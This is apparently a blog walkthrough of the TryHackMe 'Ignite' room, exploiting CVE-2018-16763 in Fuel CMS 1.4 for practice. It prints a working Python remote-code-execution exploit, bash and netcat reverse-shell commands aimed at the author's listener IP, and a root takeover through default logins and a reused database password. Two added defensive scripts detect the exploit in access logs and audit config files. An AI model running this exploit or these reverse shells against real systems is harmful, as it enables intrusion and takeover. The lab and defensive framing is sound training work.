Ignite — TryHackMe Walkthrough

Advait Jadhav
5 min read · Mar 20, 2024


Ignite

Hello! Today I’ll be solving ‘Ignite’ on TryHackMe.

This room is vulnerable to CVE-2018-16763, an RCE vulnerability found in Fuel CMS version 1.4.

Room Link: https://tryhackme.com/room/ignite

Let's get started!

Right off the bat, I'll add my target's IP address to /etc/hosts.

/etc/hosts

Step 0: Reconnaissance

To get started, I'll enumerate the target host for open ports using Nmap (Network Mapper).

sudo nmap -T4 --min-rate=10000 -p- -A ignite.thm -oN logs/initial_nmap
  1. -T4 — spend maximum 4 seconds scanning a single port.
  2. --min-rate=10000 — sends a minimum of 10000 packets per second
  3. -p- — scans all ports
  4. -A — enables aggressive scanning
  5. -oN — saves output in normal format
nmap scan

Got only one open port (quite strange), 80/tcp — HTTP — running an Apache web server with Fuel CMS.

The robots.txt has one disallowed entry, /fuel, which is the login page for the CMS.

Step 1: Web Exploitation

Let's visit the website running on port 80.

home page

It's the default Fuel CMS page; let's try to log in to the CMS dashboard.

login panel

We’ll first try the default username and password admin:admin

cms dashboard

And we get access to the dashboard. Let's navigate to the pages tab and try to upload a PHP reverse shell.

pages upload

The server isn't set up for file uploads, so we have to find a way around that.

Back on the homepage we get the version of Fuel CMS that is currently running (version 1.4 in this case).

Let's check whether there are any exploits for this version.

searchsploit

Found a few exploits; we'll use the first one, which exploits the RCE vulnerability CVE-2018-16763.

The Python code for the exploit had some errors, so I had to fix it manually.

Original Exploit

# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763


import requests
import urllib

url = "http://127.0.0.1:8881"


def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start


while 1:
    xxxx = raw_input('cmd:')
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    proxy = {"http":"http://127.0.0.1:8080"}
    r = requests.get(burp0_url, proxies=proxy)

    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)

    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)

    print r.text[0:dup]

Fixed exploit

# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763


import requests
import urllib.parse   # Python 3: quote() lives in urllib.parse, so import the submodule explicitly

url = "http://ignite.thm"


def find_nth_overlapping(haystack, needle, n):
    # Position of the n-th occurrence of needle; used to cut off the duplicated page body
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start


while 1:
    xxxx = input('cmd:')   # Python 3: raw_input() became input()
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.parse.quote(xxxx)+"%27%29%2b%27"
    #proxy = {"http":"http://127.0.0.1:8080"}   # Burp proxy from the original script, not needed here
    r = requests.get(burp0_url)

    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)

    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)

    print(r.text[0:dup])   # Python 3: print is a function
RCE attack
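A defender-side counterpart to the exploit above, added here as an example that is neither part of this walkthrough nor of the original exploit script: it parses Apache combined-format access log lines (constructed samples, not logs from the room), picks out requests to the vulnerable /fuel/pages/select/ endpoint, percent-decodes the filter parameter and reports values that look like injected PHP rather than a plain page filter. The log format, the sample IPs, the user agents and the detection heuristics are my assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-log lines (not from the room). The second line
# carries the URL-encoded filter value exactly as the exploit script builds it.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Mar/2024:10:01:02 +0000] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Mar/2024:10:01:07 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27id%27%29%2b%27 HTTP/1.1" 200 2048 "-" "python-requests/2.31.0"
10.0.0.5 - - [20/Mar/2024:10:01:09 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# PHP functions whose name has no business inside a page-filter value
PHP_EXEC_NAMES = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval")


def classify_filter(value):
    """Return the reasons a decoded filter value looks like a CVE-2018-16763 attempt (empty if none)."""
    reasons = []
    if "'" in value and "(" in value:
        reasons.append("quote-and-call")      # a string literal is closed and a call follows
    if "$" in value:
        reasons.append("php-variable")        # PHP variable syntax inside a filter string
    for name in PHP_EXEC_NAMES:
        if re.search(rf"\b{name}\b", value):
            reasons.append(f"php-func:{name}")
    return reasons


def scan_log(text):
    """Yield one finding per suspicious filter value sent to /fuel/pages/select/."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.rstrip("/").endswith("/fuel/pages/select"):
            continue
        # parse_qs percent-decodes once; a second unquote() catches double-encoded payloads
        for raw in parse_qs(parts.query, keep_blank_values=True).get("filter", []):
            decoded = unquote(raw)
            reasons = classify_filter(decoded)
            if reasons:
                hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                             "filter": decoded, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} status={hit["status"]} reasons={hit["reasons"]}')
```

Because the only thing the attacker controls is the filter query string, decoding that one parameter and checking it for PHP syntax is a far tighter signal than matching on the raw percent-encoded bytes, which change with every command and every encoder. The same scan can be pointed at a real access log by replacing SAMPLE_LOG with the file contents.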

We get a little shell to exploit the RCE vulnerability. Let's start a netcat listener and get a reverse shell.

nc -nlvp 1234

I tried to get a reverse shell using the traditional way:

bash -i >& /dev/tcp/10.17.101.143/1234 0>&1

But it didn't work, so after referring to PentestMonkey's reverse shell cheat sheet I finally got a shell using the netcat payload:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.17.101.143 1234 >/tmp/f

As you can see, we don't get a response from the web server and the shell just hung after executing the command.

This is because we got a reverse shell on our netcat listener.

Step 2: Compromising the system

reverse shell

We have a reverse shell on the target host, but it isn't very friendly at the moment, so let's stabilise it.

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

<CTRL> + Z

stty raw -echo; fg

And now we have a stable shell with tab autocomplete and other features.

Let's search for the first flag.

find / -type f -name "*.txt" 2>/dev/null | grep "flag"
user flag

Easy catch!

Step 3: Privilege Escalation

We can't use sudo -l to check which commands the current user may run as root, since we don't have the sudo password.

So let's check the web app's config files for any leaked credentials.

The default Fuel CMS page states that the database username and password are set in database.php, so let's read database.php and grep for the keyword "pass".

grep -A 5 -B 5 "pass" database.php
  1. -A 5 — print 5 lines after the keyword “pass”
  2. -B 5 — print 5 lines before the keyword “pass”
database.php
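A defensive follow-up to reading database.php, added here as an example that is not part of the walkthrough: it walks a web root for CodeIgniter/Fuel CMS-style database.php files, parses their 'key' => 'value' settings, and reports plaintext database passwords, passwords that are empty, equal to the username or a common default, and config files readable or writable by other users. The sample config, its placeholder values and the fuel/application/config directory layout are constructed for the demo.

```python
import os
import re
import stat
import tempfile

# Constructed CodeIgniter/Fuel CMS-style database.php; the values are placeholders,
# not the room's real credentials.
SAMPLE_DATABASE_PHP = """<?php
$active_group = 'default';
$db['default'] = array(
    'hostname' => 'localhost',
    'username' => 'fueluser',
    'password' => 'fueluser',
    'database' => 'fuel_schema',
);
"""

# 'key' => 'value' pairs inside a CodeIgniter $db array
PAIR_RE = re.compile(r"""['"](?P<key>\w+)['"]\s*=>\s*['"](?P<val>[^'"]*)['"]""")

COMMON_DEFAULTS = ("admin", "password", "root", "123456")


def parse_db_config(text):
    """Return the string-valued settings of a CodeIgniter-style database config as a dict."""
    return {m["key"]: m["val"] for m in PAIR_RE.finditer(text)}


def audit_config(path):
    """Report weaknesses of one config file: plaintext or weak DB password, lax file mode."""
    with open(path, encoding="utf-8") as fh:
        cfg = parse_db_config(fh.read())
    mode = os.stat(path).st_mode
    findings = []
    pw = cfg.get("password")
    if pw is not None:
        findings.append("plaintext database password in config")
        if pw == "":
            findings.append("empty database password")
        elif pw == cfg.get("username") or pw.lower() in COMMON_DEFAULTS:
            findings.append("weak or default database password")
    if mode & (stat.S_IROTH | stat.S_IWOTH):
        findings.append("config readable or writable by other users")
    return {"path": path, "username": cfg.get("username"), "findings": findings}


def audit_tree(root):
    """Walk a web root and audit every database.php found under it."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name == "database.php":
                results.append(audit_config(os.path.join(dirpath, name)))
    return results


def demo():
    """Build a throwaway web root holding the constructed config and audit it."""
    with tempfile.TemporaryDirectory() as root:
        # Assumed Fuel CMS-style layout, constructed for the demo
        cfg_dir = os.path.join(root, "fuel", "application", "config")
        os.makedirs(cfg_dir)
        path = os.path.join(cfg_dir, "database.php")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_DATABASE_PHP)
        os.chmod(path, 0o644)   # world-readable, as a default umask would leave it
        return audit_tree(root)


if __name__ == "__main__":
    for result in demo():
        print(result["path"])
        for finding in result["findings"]:
            print("  -", finding)
```

The check that matters most in this room is the password reuse: the database password in the config doubling as the root password is exactly what turned a web-app compromise into a full root. That cannot be detected from the config alone, but a plaintext password in a world-readable file is the precondition, and flagging it early is cheap.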

Caught the password for the root user. Let's switch to root and grab the root flag.

rooted shell

Pwned!

Conclusion

Ignite is an easy-rated room on TryHackMe. To pwn this box I exploited the RCE vulnerability CVE-2018-16763, which existed in version 1.4 of Fuel CMS. For privilege escalation, I used the leaked credentials inside the database.php file and successfully rooted this room!
